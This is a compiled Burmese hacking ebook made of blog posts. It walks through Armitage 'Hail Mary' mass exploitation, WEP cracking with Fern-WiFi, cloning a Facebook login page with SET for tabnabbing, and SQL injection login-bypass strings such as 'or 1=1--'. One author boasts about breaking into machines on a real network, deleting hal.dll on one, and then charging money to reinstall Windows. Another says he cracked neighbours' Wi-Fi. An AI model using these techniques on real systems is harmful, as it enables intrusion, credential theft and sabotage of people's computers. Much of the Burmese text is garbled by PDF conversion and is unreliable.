bt ebook ဇဴလဳိင္မင္းေဝ....@္(နည္းပညာ)

Backtrack 5 > Theharvester Information Gathering Tutorial Posted on August 26, 2012 by Dominator

Information Gathering ထ Step ) - ထ ထ

http://www.backtrack-myanmar.co.cc/?p=108

http://www.backtrack-myanmar.co.cc/?author=1

./theHarvester.py -d google.com -l 500 -b google ./theHarvester.py -d targetsite.com -l 500 -b google Personal Inf - ထ

http://www.backtrack-myanmar.co.cc/wp-content/uploads/2012/08/aarg.png

Kyaw Swa Htoon ထ ထ ထ –

https://www.facebook.com/universaljoker

http://www.backtrack-myanmar.co.cc/wp-content/uploads/2012/08/Untitled.png

http://www.backtrack-myanmar.co.cc/wp-content/uploads/2012/08/33.png

ယခ ႏစကနပငးေလးမာ ကေနာရ႕ခစလစြာေသာ လကတြေဖာ ညအစကေတြက

ကေနာရ႕နညးပညာေလလာေတြ႕ရခကအခ႕က သငၾကားျပသသြားမာပါ..ကေနာတ႕အဖြ႕ေတြက

Gray Hack ေတြျဖစတာန႕အည ကေနာတ႕ရ႕စတေတြဟာလ မးခးလဘ အျမေျပာငးလေနတာပါ..

ကေနာတ႕တတကၽြမးတနညးပညာေတြန႕ကယန႕နးစပရာ ကြနပတာအသးအျပသမားက ကသလ

လရ ၀မးလ၀ ဆတစတထားန႕ကညခၾကပါတယ.ဒလကညႏငဖ႕ဆတာကလ..တစလႏစလအတြငး

သငယတတေျမာကလာတ ပညာရပေတြန႕ကညတာမဟတပါဘး..ႏစရညလမား ကယဘာသာ

အငတာနကမာေရာ.အျပငေလာကမာပါ ဆရာမရဘ ေလလာသငၾကားခရတသေတြပါ..ျမနမာႏငင

ဟာ နညးပညာေခတကဥးတညေနၿပ..တးတကလာေနၿပ..အတကအခကေတြမားလာေနၿပ.ေနာက

ပငး ႏငငကျမငမားတ နညးပညာေတြလႊမးမးလာေတာမယဆတာ သာမနလတနးစားေတြ ဘယသမ

သပမသၾကဘး..ဒါေၾကာင အခကတညးက တကခကဖ႕ကာကြယဖ႕ကေနာတ႕ေတြျပငဆငေနၾက

တယ..ဥပမာ ေျပာရရင လာမယႏစႏစအတြငးမာ ကြနပတာတစခလးအတြငးမာရတ Data ေတြက

အေ၀းထနးစနစန႕ဖကဆးပစႏငေလာကတအထ နညးပညာေတြျမငမားလာေတာမယ.အခကတညး

ကအရပ အေယာငေတြ ျပေနၿပ.စမးသပခကအခ႕ေအာငျမငေနၿပ..ဒါေတြက သေနလ႕

ကြနပတာအသးျပသတငးက တတကၽြမးနားလညသမားက ကာကြယဖ႕နညးလမးေတြေျပာျပေန

တယ.. ဒလ ေျပာျပေနတာေတြက ေစတနာကနားမလည..အသအမတမျပ

“ေပါေတာေတာ..ရးေၾကာငေၾကာင”အလပေတြလ႕”.ကေနာန႕သကဆငသတစဥး..ဒါမမဟတအျခား

တစေယာကကကေနာကေစာကားခတယ..။ ကေနာလ

Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.

အရာရာသးခလာသမ..ဒတစခကတညးနတင ေစတနာဆတာ လတငးန႕မတနပါဟ

နားလညခတယ..ေအာ..ကယပါးစပပတမေနႏငလ႕အေျပာခခရတာဘေလ။

ဒေနရာမာ တစျခားတစစမးတစေယာကသာဆရင ကေနာလကစားေခမမာဘ ကြနပတာတစလးရ႕

တနဖးက အနညးဆး ေလး ငါး ေျခာကသနးေလ..အလတနဖးကခဏခငး အေ၀းကေနဖကဆးပစ

လ႕ရတယ..ပကသြားခရငလ ဘယလတရားစြခငသလ.သကေသရသလား မရဘးေလ.ဒါေၾကာင

ကယဘကက အျမတကနတာေပါ..ထားပါေတာ ဒါကေနာေျပာျပတာပါ..တကယလ႕ ကေနာအဖြ႕

ထက ညအစကေတြကလ ေစတနာေစာကားခသညရေသာ.ဘယလနညးန႕လကတ႕ျပနႏငတယ

ဆတာ ကေနာ သငၾကားျပသေပးသြားမယ.အငဂငနယာဘာသာရပပျဖစျဖစ..သတေဗဒ

ဘာသာရပပျဖစျဖစ.. ပညာရပက ပညာရပဘျဖစတယ.ကေနာတ႕အေနန႕ဘယသ႕ဘယသ႕ကမလ

ပညာရပန႕ပတသကၿပးမေစာကားခဖးဘး..ကေနာတ႕ရ႕ Hacker ပညာရပန႕ပတသကၿပးေတာလ

ေစာကားတာမခႏငဘး.ပညာရပသငၾကားတယဆတာ ၀မးစာရာဖ႕လ႕ေလာကအကး အသးခဖ႕ဘ

ေလ.. သတစပါးရ႕ ပညာက ရကပတေစာကားဖ႕ စတဓာတလး၀မရရးအမနပါ.ဒလစတဓာတမးရတ

သေတြကလ ကေနာတ႕အေနန႕အျပငးအထန ရႈတခပါတယ..ကေနာတ႕ရ႕ ပညာရပန႕ပတသကၿပး

မယရငစမးသပၾကညႏငပါတယ..မလပခငလ႕မလပတာဘရတယ..လပၿပေဟဆလင ၾကပငခတ

ၾကငတပါမကနရငးတတတာ Zer0 0r Her0 ရ႕အကငပါ..။ ျမနမာႏငငမာ အတတပညာသာရၿပး

အသပညာေတြနမပါးေနပါၿပ…ဘြ႕ရပညာတတဆတငးလ ေသာကထငမၾကးပါ..ဘာလ႕လဆေတာ

အသပညာနမပါးေနလ႕ပါဘ..ေစာကားတာလမဟတသလ.ဘယသ႕ကမလညးမရညရြယပါ..အမား

စက ဥးတညေျပာေနျခငးျဖစပါတယ.အထမယ ကယမားပါေနရငေတာ ျပငလကေပါေလ..အဟတ။

ဒါေၾကာင ဘယသ႕ကမလညး ပညာရပန႕ပတသကၿပးအထငမေသးပါန႕..မေစာကားပါန႕.ကယက

ကယလညး အထငမၾကးပါန႕..အားလးကသနရာသနရာ ပညာရပတစခမေလာကလမးေနရတာပါ

ဥးတညခကက ဘ၀အာမခခကရဖ႕န႕စား၀တေနေရးအတြက ဆတာ အတတခညးပါဘ။ ဒါေၾကာင

Zer0 0r Her0 အဖြ႕သညလညး က႕လမးကယေလာကေနျခငးပါ..ဘယသ႕မ ေသာကဂရမစကပါ။


အျမတမးနညးပညာန႕ပတသကရင တတကၽြမးတပညာရငေတြန႕တငပငၿပးကညေပးေနတတသလ

မမတ႕ပညာရပကတနဖးထားသညအတြက ေစာကားပတခတလာလငလ တကခကဖကဆးဖ႕၀နမ

ေလးတတပါ..။ အခ Buffer Over Flow န႕ဆကႏြယတNetwork Hacking

ကသငၾကားျပသေပးမာျဖစပါတယ..

အေျခခရသေရာ၊ မရသပါ လကေတြ႕လပေဆာငႏငေအာင ေရးသားထားပါတယ။

ဆတာ ဟ႕အရငကတညးက ခထ application , os န႔ တျခားsoftware

ေပါကေနသည vulnerability က exploit လပႏငတနညးပါ။ အခက Network Hacking န႕ေရာၿပးတငျပ

သြားမာျဖစပါတယ..အရငဆး BackTrack 5 ကအသးျပၿပး သကဆငရာ Target ရ႕

Ip Addressခတဆကၿပး ၄ငးရ႕ ကြနပတာအတြငးသ႕၀ငေရာကမာပါ..၄ငးရ႕ ကြနပတာအတြငး

ေရာကပဆမေတာ Computer အတြငးမယရတ Data ေတြကဖကမလား..ScreenShoot ရကမလား။

အငတာနကဆငမာသးေနရငး တစဆငလးမာရတ ကြနပတာေတြကထနးခပခငသလား.၊

Wireless ကြနယကမာ Server အပါအ၀င Wireless သးေနတကြနပတာ Laptop ေတြကထနးခပခင

သလား.ဒနညးက သပကအသး၀ငပါလမမယ.ကေနာလကေတြ႕အေနျဖင ေနျပညေတာတကသလတစခမာ

ရတ Wireless ကြနယကက စမးသပၾကညရာမာ Network န႕ခတဆကထားတကြနပတာ Desktop

ၾကးေတြ သာမက.. Wireless သးေနတကြနပတာ Laptop ေတြကပါထနးခပလ႕ရခပါတယ.ဒါေပမယ

ကေနာ ဘားမမလပခပါဘး.လပမယလပခငရငလ အားလးက Format ခညးရကေပးလကခငပါတယ.ဒါေပ

မယ ကေနာခစသကြနပတာ i5 Laptop ေလးထသြားမာစးတအတြက မလပခပါဘးေလ…အဟတ။

က.လပေဆာငပအဆငဆငကဆကေျပာပါမယ…။

BackTrack Terminal ကအရငဖြငပါ။

အရငဆး cd /pentest/exploits/framework ကရကပါ။ပမာျပထားပါတယ.ၿပးေတာ ls ကရကၾကညလက

Armitage ကေတြ႕ပါမယ။ Armitag ကေခၚမယ။ ./armitage ၿပးေခၚလကပါၿပ.ပမာၾကညပါ။


ေအာကပါ ပအတငး Box တကလာရင Start MSF ကႏပပါ။ Default user

အတငးဘထားပါ.ဘားမမေျပာငးပါန႕။(BackTrack5 R3 မာဆရင ေတာ Connect န႕ Help

ဘေပၚမာပါ။ Connect ကႏပလကပါ Yes or No ေမးရင Yes ေပးလကပါ။ Progress Bar

တကလာပါလမမယ ေစာငၾကညေနလကပါ။ျပညသြားၿပဆတာန႕ေအာကပပါအတငး……….

Armitage Promgram ေပၚလာၿပ..ပပါအတငးျပလပပါမယ။ အေပၚက Tool Bar

ထက Host > Namp Scan > Quick scan(Os detect) ကေရြးပါမယ။ (BackTrack R3

မာဆရငေတာ MSF Scans ကေရြးေပးရပါမယ။)


R3 မာ MSF Scans ကေရြးေပးလကတာန႕ IP ထညစရာ Box ေလးတကလာပါလမမယ။

ဥပမာအားျဖင Network တစခတြငးမာ ကြနပတာ 15 လးရတယဆပါစ႕.. အဒကြနပတာအငပေတြ

က 192.168.1.1 ကေန 192.168.1.15 အထသတမတထားပါတယ။ ဒေတာ အငပထညစရာ Box

ထမာ 192.168.1.1-192.168.1.20 လ႕ရကထညေပးၿပး OK ေပးလကပါ။ Open ျဖစေနတ TCP

ေတြက စရာေနပါၿပ..Complete ျဖစတအထ ေစာငေပးပါ။ Scan Complete ျဖစၿပဆတာန႕

Network အတြငးမာရတ ကြနပတာေတြ ကျမငရေတာမာပါ။


Tool Bar က Attack > Hail Mary ကေရြးပါ..အဒအခါမ Exploit ေတြက Scan

ဖတေနတာေတြ႕မာပါ။ Scan ဖတၿပး တာန႕ ခဏေစာငၾကညေနပါ.. Prot Attack

ခရတကြနပတာဟာ မးၾကးပအနေရာငန႕ျပေနမာပါ။ အဒကြနပတာက Right Click ေထာကၿပး

စတၾကက ေမႊႏငပါၿပ..။


Screen Shoot ရကမလား၊System 32 ထက၀ငေမႊမလား..Data ေတြက Download ခမလား၊

Upload တငမလား၊ Target ကြနပတာထမယ Shell တငမလား..Virus

လႊတမလား..ကေနာကေတာ ဘာလပသလဆရင System 32 ထက ၀ငၿပး hal.dll ကဖကပစလက

တယဗာ..အအခါကရင ၀ငးဒးတကမလာေတာဘးေလ..မၾကာပါဘး ေနာကထပ တစနာရေလာက

ဆရင ကေနာက ဌာနဆငရာေတြကဖနးဆကၿပးေခၚပါတယ… “ကြနပတာ Windows ကသြားလ႕

လာတငေပးပါဥး” တေလ..က..၀ငးဒးတစခါတင 7 ေထာငဗာ…အေ၀းကေနထငဖကတယ…..

ဖနးဆကေခၚရင သြားျပငေပးလကတယ..လာထား 7 ေထာင..ကယစားေပါကန႕ကယကေတာ

အဆငကေျပလ႕ေပါ…ဟဟ…..။

www.minsoeyarsar.com

([email protected])

Blogger Zer0 0r H3r0


Dual Boot install Backtrack 5 Posted by Aung Kyaw Moe

Backtrack 5 က ကြနေတာ Window 7 နတြတငနညးေလးေရးေပးပါမယမခကပါဘး လြယပါတယေတာေတာကလြယပါတယ အရငဆး Backtrack 5 က Live အေနန Boot တကလကပါ ေနာက startx ကနပျပး ငလကပါ ျပးရင Backtrack 5 ေပါလာပါလမမယေနာက Desktop ေပါမာရတ Install Backtrack ဆတ icon ကနပျပး Install လပဖျပငဆင ပါ ………..ပမာျပထားပါတယ ……….:P

ပမာျပထားတအတငးပ next ကနပလကပါ…….ေနာကတစပကၾကညပါ……….

http://ghostarea.net/author/aung-kyaw-moe/

http://www.gophoto.it/view.php?i=http://ghostarea.net/wp-content/uploads/2012/05/Screenshot.png

ပမာျပထားတအတငးပ Region န႕ Time Zone ကေျပာငးေပးလကပါေနာက Next ကႏပပါ………

Forward ကႏပပါ…………

http://www.gophoto.it/view.php?i=http://ghostarea.net/wp-content/uploads/2012/05/Screenshot-21.png




ကြနေတာတ က Partitions ကအသစနခြတငပါမယ အဒါေျကာင Specify partitions manually (advanced) ကေရြးလကပါ ေအာကမာျပထားတအတငး Box ေလးကလာပါလမမယ

YAN NAING OO

Typewriter


ကယထားခငတ Amount ေလာကထားလကပါ အေရးျကးတာက mount point ေနရာမာ / ေလးကေရြးေပးဖမေမပါနေနာ….ေနာက OK ကနပပါ တစခါ

ကြနေတာေလာေလာနကနခတာရပါတယ swap file ကလ 1 Gb ေလာကထားေပးလကပါ Specify partitions manually (advanced) ကေရြးလကပါ အေပါကနတတပါပ mount point ေနရာမာ

swap ကေရြးေပးပါ အဒါဆရပါျပေနာက OK ကနပပါ…….


Install ကနပပါ…………….



သြငးျပးတအထေစာငပါ အားလးျပးသြားရငေအာကကအတငးပ ေပါလာပါလမမယ အခါကရင Restart လပလကပါ ျပနတကလာရင Dual Boot နတကလာပါလမမယ

Default username and password က root/ toor ျဖစပါတယ ေနာက Graphic interface က run ဖအတြက Startx လ command ေပးရပါမယ…… အေလာကဆအဆငေျပ မယလေမာလငပါတယ ကြနေတာတသညလညးအရမးကေတာေနတတေနတသမားမဟတျကပါ သာမနေလလာသအဆငေလာကသာရပါေသးတယ ဒါေပမယကြနေတာတ သသမ တတသမေလးေတြက သငယခငးမားအားလးအလြယတကေလလာနငေအာင ေရးတငေပးထားျခငးသာျဖစပါတယ အားလးပအဆငေျပတာမေျပတာေလးေတြက comment ေလးေတြထားေပးခေစခငပါတယ……ဒပစျဖင သငဆရာ ၊ ျမငဆရာ ၊ ျကားဆရာမားအားလးက ဂါရျပလကပါတယ…………:P


Cracking WEP Key With Fern-Wifi Cracker In Backtrack 5 R3 Posted by Aung Kyaw Moe

ကၽြနေတာတ႕ သငယခငးမားေဘာတာမားက Backtrack က Wifi Hack အေနန႕ပ သၾကတာမားပါတယ Wifi Hack ေၾကာငပ Backtrack ကသၾကပါတယ ကၽြနေတာေလလာထားသေလာကေပါေနာ အေတာကၽြနေတာလညးစဥးစားတယ wifi hack အေၾကာငးေလးေရးမယေပါေနာ ဒါေပမယအခဟာကကၽြနေတာရ႕ ပစက တစကယ အစစ လႊငထားတလငးေတြေပၚမာစမးထားတာဆေတာ သတ႕က ( wifi ) လႊငတဆငေတြကအားနာတာကတစေၾကာငးဆငးတငးကအစကေတြန႕သေနတာကတစေၾကာငး သတ႕ wifi password က ဆဒေပၚမာဟတျပးမျပခငတာကနားလညေပးပါလ႕ပထမဆးေမတာရပခခငပါတယ အခေျပာျပမယ fern-wifi cracker ကဘယေလာကေတာငလြယလဆရငသက ေလးတနးကေလးကေတာငကြနျပတာကငျပးဟတလ႕ရပါတယ အရငလ command ေတြန႕မရႈပေတာပါဘး လြယပါတယ ကစရေအာင အရငဆး Fern-wifi cracker ရတေနရာကသြားလကပါ ေအာကမာျပထားပါတယ


ျပးရငဖြငလကပါ ေအာကမာက fern-wifi cracker က GUI အေနန႕ေတြ႕ရတပ

အေပၚကပမာ Select Interfaces ေနရာမာ wlan0 ကေရြးလကပါ ေနာက ေအာကက Scan For

http://www.gophoto.it/view.php?i=http://ghostarea.net/wp-content/uploads/2012/09/Screenshot1.png


Access points ကႏပလကပါ ေအာကကမနေနတဟာေလးေတြလငးလာပါလမမယ button ကေျပာတာေနာ………….:P

ႏပလကပါ ေအာကကပမာၾကညပါ ႏပျပးသြားတအေျခအေနေပါ သက လငးေတြကရာျပးရင ဘယႏစလငးရလေဘးမာေဖာျပပါလမမယ ေအာကကပမာၾကညပါ


အခကၽြနေတာတ႕ က WEP က ဟတမာပါ အေတာ WEP ကငါးလငးရပါတယ Wifi WEP ကႏပလကပါ ေအာကကပမာၾကညပါ ရေနတလငးေတြကျပပါလမမယ



ကအေနာကေတာကယလငးကျပနဟတတယဂာ ဟးဟး :p ကေရြးလကပါတယ အစကတ႕ေတာအစကတ႕ေပၚတဟာေရြးေပါေနာ သားန႕ေတာတမာမဟတဘးေလေနာ ေနာကမ Group ထမာဟနငန႕လညးတဘးဆျပးလာေျပာန႕……..:P ေနာက WIFI Attack ဆတအေပၚဆးက Button ကနပလကပါ…….ေအာကကပမာၾကညပါ……….:D

ကအခဆရငအားလးအလပလပေနပါျပ………..:P ေအာကကအနတနးေလးျပညသြားရင ေအာကဆးမာ Password ထြကလာပါလမမယအေနာ Password ထြကတ screenshot ကေတာမထညေတာပါဘး….:D မရလ႕မဟတပါဘး ရမရကေတာအစကတ႕ဟတၾကညရငသမာပါ အေနာမကႏာနာလ႕ထညေတာဘး…အဆငေျပပါေစ… Wifi လငးမားက ဟတ ျပးပကပကမကနပသးႏငပါေစလ႕ဆေတာငးေပးလကပါတယ အေနာကေတာေပးျပးသးတာ ဟးဟး ………..:P

ဆကလကၾကးစားပါအးမယ

ေကးဇးတငပါတယ………..;)


Hack Facebook Account in Back Track Posted on August 26, 2012 by Dominator

..

- .

http://www.backtrack-myanmar.co.cc/?p=89

http://www.backtrack-myanmar.co.cc/?author=1

http://www.backtrack-myanmar.co.cc/wp-content/uploads/2012/08/ahta.png

၂ .. 2.Website Attack Vectors

၃ .. 4.Tabnabbing Attack Method

Enter the URL yo Clone: W - —

http://www.backtrack-myanmar.co.cc/wp-content/uploads/2012/08/dd.png

http://www.facebook.com/login.php …

Install Nvidia Driver in Backtrack 5 R3 (Easy Way) Posted by Aung Kyaw Moe

ကၽျနးေတားတ႕ ကျနးပတာမြာ Graphic Driver ကလညးအေရၾကတာကေနား အေတာ ကၽျနးေတားတ႕ Linux မြာလညး Graphic Driver သျငးလ႕ရပါတယးအဒါသျငးပမြ Compiz ကအလပးလပးပါတယး (Backtrack မြာေပါေနား………:D) အခကၽျနးေတားေပာပမယးနညးက လျယးပါတယးေနာကး တခာနညးေတျထကး ၅ဆ ေလာကးပမနးပါတယး ပေတာဒပစးမြာ ပမတငးပါဘ ဘာလ႕လဆေတာတငးစရာကမလေအာငးလျယးေနလ႕႔ပါ……………….:P

အရငးဆ ကၽျနးေတားတ႕ Backtrack က restart ခပါမယးေနာကးအရငးအတငးပBoot တကးပါမယးပရငး Login ငးပါမယးေနာကးအမြာအေရၾကတာက Startx ကမရကးခငးလပးရမြာပါ ကစရေအာငးသျငးနညးေလ………….:P

အရငးဆကၽျနးေတားတ႕ Graphic Driver ကေဒါငးလဒးလပးရပါမယး ဘယးမြာလပးရမလဗာ ေအားသ႕ရ႕ဆဒးမြာသျာလပးေပါေနား ေအာကးကလငးကသျာလကးပါ အမြာကယးရ႕ Graphic Driver ကေရျ ပ ေဒါငးလဒးလပးပါ ..

Driver Download: http://www.nvidia.com/Download/index.aspx?lang=en-us

ပရငးသကNvidia-linux.run ဆပ run ဖငးေလကလာပါလမးမယး ပရငးေဒါငးထာတ .run ဖငးေလက root ေအာကးမြာသျာထာလကးပါ အဒါမြရြာရတာလျယးမြာ တစးခါတညး Install လပးယပ………..:D ကအခ ေအာကးကအပာေရာငးစာသာေလႏြစးခက Terminal ထမြာ တစးခခငးစရကးထလကးပါဘာဖစးဖစးေပါေနား ဒတယအေၾကာငးကေတာနန Error ပ ပါလမးမယး ဒါေပမယး ကစၥမရြပါဘ …………..:P

1. echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf 2. update-initramfs -u

ဒေနရာမြာ အလျနး႕အလျနးအေရၾကတာကေတာ အႏြစးေၾကာငးလထညးပတာန႕ X Server က Kill ရမြာပါ reboot လပးပါ မလပးခငးရငး Ctrl+Alt+F1 ကတျႏြပးပါ GUI Backtrack ေခၚ X Server


http://www.nvidia.com/Download/index.aspx?lang=en-us

ၾကကသျာပါလမးမယးအခါမြ အမေရာငးန႕ command ရကးဖ႕ root@bt ~ ဆပေပၚလာပါလမးမယး startx ရကးပမငးခငးမငးရတပေပါေနား အမြာ

3. init 3

ကရကးထညးပါ အေရၾကတာက startx ကမရကးခငးအ command ေပရမြာေနား…………..:D

4. sh <filename>.run ————->

အလညးကFile name က ေဘာတာတ႕ေဒါငးလဒးလပးထာတ graphic driver name ပါမမြာေအာငးရကးပါေနား…………:P

အဒါဆရပါပ ကနးတာကေတာလပးတတးမယးထငးပါတယးမေရေတာပါဘအေနားကရြငးသျာစရာေလရြလ႕႔ပါ Screen Shot မတငးေပႏငးတာချငးလျတးပါ ဒနညးက တစးခာပမြနးသျငး နညးေတျထကး ၅ဆ ပမနးပအလပးဖစးပါတယးကၽျနးေတား ကယးတငးလညးဒလပသျငးထာ တာပါ

ဆကးလကးၾကစာပါအမယး ေကဇတငးပါတယး………….:P

Killing Antivirus In Backtrack 5 Posted by Aung Kyaw Moe

Backtrack မာ အသးငတ Forensics Tool ေတြထက

1. chkrootkit န႕ 2. rkhunter

ဆတ rootkit ေတြ Trojan ေတြက kill လပမယ Tool ၂ခန႕မတဆကေပးပါမယ.။

chkrootkit ကေတာ scan ဖတတေနရာမာ အခနနနပယျပးေတာ rkhunter ကေတာမနစအနညးငယအခနယပါတယ တစမးတညးန႕ပ scan ဖတမယဆရငေတာ အာမေတာသပမခႏငပါဘး rootkit ေတြ ကရငးႏငဖ႕ဆရင ႏစမးလးန႕ဖတမာ အဆငေျပႏငပါလမမယ……….ကစမးၾကညရေအာင…

Application>Backtrack>Forensics>Anti-virus Forensics Tools>

ဆျပးသြားလကပါ Chkrootkit န႕ rkhunter ကေတြ႕ပါလမမယအရငဆး Chkrootkit ကဖြငလကပါ… ပမာျပထားပါတယ……:D


သ႕ရ႕ အသးျပပန႕ Option ေတြပါ Command ကေတာ ./chkrootkit ပါ ပမာျပထားပါတယ

ဒါကေတာ scan ဖတေနတပပါ ေအာကမာၾကညပါ…..:)

http://www.gophoto.it/view.php?i=http://ghostarea.net/wp-content/uploads/2012/09/Screenshot.png


သ႕ဟာသစစသြားပါလမမယေတြ႕ရငလညးဖကလကပါလမမယ ..ဒါက scan ဖတလ႕ျပးသြားတပပါ



အခေနာကတစချဖစတ rkhunter ကဖြငပါ

ေနာက rkhunter က update လပေစခငပါတယေနာကမာ check လပပါမယ အရငဆး rkhunter — update လ႕ရကလကပါျပးသြားရင rkhunter –check ဆျပးစစလကပါ သကနနေတာၾကာပါတယ……….:P ေအာကကစစေနတပပါ……….:D စစေနတအခနမာ enter သးခါႏပခငးပါလမမယ ကၽြနေတာလငးကတကလကကလကျဖစေနလ႕ပေတြထပမ တငေတာတာပါ ……..:D


အခဟာကျပးသြားတပပါ ……..ေအာကမာၾကညပါ………



ျပးသြားရင log file ေတြကၾကညလ႕ရပါတယ var/log/rkhunter.log ဆတေနရာမာသြားၾကညႏငပါတယ Terminal ထမာ gedit var/log/rkhunter.log ဆျပး command ေပးျပး ၾကညႏငပါတယ ေအာကမာျပထားပါတယ…………

အခနကသပမရတာကတစေၾကာငး စာေမးပြကနးေနတာကတစေၾကာငး ေလာကလညခငေနတာကတစေၾကာငးတစေၾကာငး ေပါငးမားစြာျဖစ ေနေသာေၾကာင ပစေတြနနက ေနတာပါ ေနာကစာေမးပြျပးရငဒထကပအားစကျပးေရးပါမယအခေတာ

စာလညးလပေနရတာေၾကာငအရငလသပမရငးျပႏငတာန႕ လ အပခကမားရရင ခြငလြတေပးပါလ႕ေတာငးပါခငပါတယ

ဆကလကၾကးစားပါအးမယ………….;P


SQL Injection Attack Myanmar Version for Begineers

3thic0kiddi3

SQL Injection Attack For Beginners By 3thic0kiddi3

-- SQL INJECTION ဆသညးမြာ (ေရသ- က BrB)

SQL injection ဆတာကေတာ ယေန႔ေခတး အငးတာနကးစာမကးႏြာေပၚမြာ အၿဖစးအမာဆ web application

အမြာၿဖစးပါတယး။ ၄ငး web application အမြာတစးခမြေန၍ တရာမငး ငးေရာကးအသၿပသေတျ

(Hackers) က မမတ႔ရ႕ အေရၾကတ႔ အခကးအလကးေတျက ခယသျာႏငးပါတယး။ ဒါေၾကာငး SQL injection

ဆတာ web or db server တ႔ရ႕ အမြာေၾကာငးမဟတးပ အေတျ႔အၾကမ၊ အေရအခငး ညဖငးတ႔

programming ေရဆျသေတျေၾကာငးသာၿဖစးပါတယး။ ဒနညးလမးက အေတစးေနရာကေန application,

web server က အလျယး ကဆထနးခပးႏငးပါတယး။ ဒ SQL injection မြာ ပစအမမေသာ SQL

commands ေတျ န႔ web page ကေန အမမေသာ data ေတျက ထတးယႏငးပါတယး။

ဥပမာတစးခအေနန႔ေၿပာမယးဆရငး ကၽျနးေတားတ႔က Company တစးခရ႕ Network

တစးခက ငးေရာကးေတာမယးဆရငး port scanner ေတျန႔ sanner ဖတးၿပ အမြာေတျန႕ ပျငးဟေနတ႔ port

ကေန ငးေရာကးသျာႏငးပါတယး။ ဒါေပမ႔လညး အငးတာနကးန႔ ခတးဆကးထာတ႔ Web Server (Host Sever)

တစးခက port 80 ေလာကးပဖျငးမယး၊ တစးၿခာ security ပငးေတျ ေပထာမယးဆရငး port scanner

ဘယးေလာကးေကာငးေကာငး အလပးၿဖစးမြာမဟတးပါဘ၊ ငးေရာကးဖ႔ခကးသျာပါလမးမယး( ခကးခေနမယး )...

ဒါဆရငး Web Hacking က ဦတညးၿပေၿပာငးၾကညးရပါလမးမယး... Web Hacking လ႔ေၿပာရငး

ေတားေတားမာမာကေတာ SQL Injection ကပထမဦစျာေၿပၿမငးၾကမြာပါပ... ဟတးတယးေလ.. SQL

Injection ကတစးၿခာဘာမြမလဘ Web Browser တစးခပလတယး...

SQL Injection အေႀကာငးရြငးပခကးမာ-

SQL injection နပါတးသတးလ Web development knowledge ရြရငးေတာပေကာငးပါတယး။PHP န

MysqL အေႀကာငး Knowledge နနရြထာရငးေတာ ပ ပနာလညးပါလမးမယး။

---DATABASE ဆတာဘာလ?---

ရရရြငးရြငးပါပ... Database ဆတာဘာလဆရငး Database ဆတာ အခကးအလကး Data

ေတျစစညးသမးဆညးထာတ႔ Application တစးခပါပ... Application Programming Interface (API)

ေတျက တညးေဆာကး အသၿပမယး ထနးသမး သမးဆညးထာမယး။ Database(DB) servers ေတျဟာ Web

development လပးငနးေတျ န႔လညး ေပါငးစညးအသၿပလ႔ရတ႔အတျကး ၄ငးအထက data ေတျက

ထတးယအသၿပ၊ ၾကညးရႈ႕ဖ႔ဆတာ ခကးခ႔တ႔ကစၥတစးခေတာမဟတးပါဘ။ Database အထမြာ usernames,

passwords စသညး ေတျလ အေရၾကတ႔ အခကးအလကးေတျကလညး သမးဆညးႏငးတာ ၿဖစးတ႔အတျကး

Database ရ႕ လၿခေရဟာလညး အလျနးကအေရၾကပါတယး။ ထနးသမးမႈ ညဖငးတ႔ database

တစးနညးအာၿဖငး အမြတးတမ႔ၿဖစးေစ၊ သတမမႈ၍ေသားလညးေကာငး၊ အေၾကာငးေၾကာငးအမမေၾကာငး

programmer ေတျေရသာထာတ႔ code ေတျရ႕ လျမြာမႈေတျ ေၾကာငး ဒလဟာကျကးေတျ ၿဖစးေပၚကာ

database ထက အၿခာ တရာမငး ငးေရာကးသတ႔အာ လမးဖျငးေပသလၿဖစးသျာတတးပါတယး။ DB

servers ေတျအမာၾကရြတ႔အထမြာ ဒါေလေတျက အသမာတာေလေတျပါ။

MySQL(Open

source),

MSSQL,

MS-ACCESS,

Oracle,

Postgre SQL(open

source),

SQLite စသညးေပါ႔...

Database ရ႕ တညးေဆာကးပေလက ၿမငးႏငးေအာငးလ႔ ဇယာေလန႔ၿပထာတာပါ။

---ေရြာငးကျငး ငးေရာကးၿခငး---

Site ေတျမြာ username, password ေတျန႔ login ငးခငးတယးဆတာ site အထမြာ ရြတ႔ content ေတျက

မြတးပတငးထာတ႔သ (username & password ရြထာတ႔သ) ေတျကသာ ၾကညးရႈအသၿပချငးေပထာတာပါ။

အကယး၍ မတးေဆျက username & password မရြပ ရြသက႔သ႔ ငးေရာကးအသၿပမယး (user registration

မလပးပ ငးေရာကးတယး) ဆရငး ဒါက BYPASSING LOGINS လပးတယးလ႔ေခၚပါတယး။

ဒါကေတာprogrammer ရ႕ login မြာစစစးမႈ မေသခာလ႔ ၿဖစးတ႔အတျကး ကေကာငးေထာကးမစျာန႔ User

name န႔ Password ကမသပ login ငးလ႔ရသျာပါလမးမယး။

ဥပမာတစးခအေနန႔ ၾကညးမယးဆရငး username က admin ၿဖစးၿပ password က 12345 ဆၾကပါစ႔...

ဒါဆရငး SQL query က SELECT USER from database WHERE username='admin' AND

password='12345' ဆၿပၿဖစးသျာပါလမးမယး..... အကယး၍ အေပၚ SELECT command တနးဖက

မြနးတယးဆရငး site ထက ငးချငးၿပမြာၿဖစးပါတယး။ အကယး၍ အထကးပါေၿပာခ႔သလ programmer က login

မြာမြနးကနးတ႔စစစးမႈမရြရငး Hacker ေတျက ေအာကးပါအတငး ငးေရာကးသျာႏငးပါတယး။

username:a or 1=1--

password:blank

SQL

query မြာေတာ

SELECT USER from database WHERE username='a' or

1=1-- AND password=''

ဒါက comment operator ပါ အ႔လပ အၿခာ

comment operator က /* ၿဖစးပါတယး။

SELECT USER from database WHERE

username='a' or 1=1

1=1 က အၿမတနး query က true ၿဖစးေစၿပ OR ကေတာ query တစးခက true ၿဖစးတ႔အတျကး

အၿခာတစးခကလညး true ၿဖစးသျာေစပါတယးဒါေၾကာငး 'a' ဆတ႔ user ဟာ DB မြာမရြေတာငးမြ ဒ query က

true ၿဖစးကာ site admin က ငးေရာကးချငးေပသျာပါလမးမယး... ဒလနညးန႔ Vulnerable ၿဖစးတ႔ site

ေတျအတျကး ေအာကးပါအတငး စမးစစးႏငးပါေသတယး...

username:' or 1='1 password:' or 1='1

username:'

or '1'='1' password:' or '1'='1'

username:or 1=1 password:or 1=1

--- လ႕ ြကးထာေသာ Data မာက ငးေရာကးအသၿပၿခငး---

SQL injection က အခလ bypassing logins တစးခတညးမဟတးပ DB servers ကေန

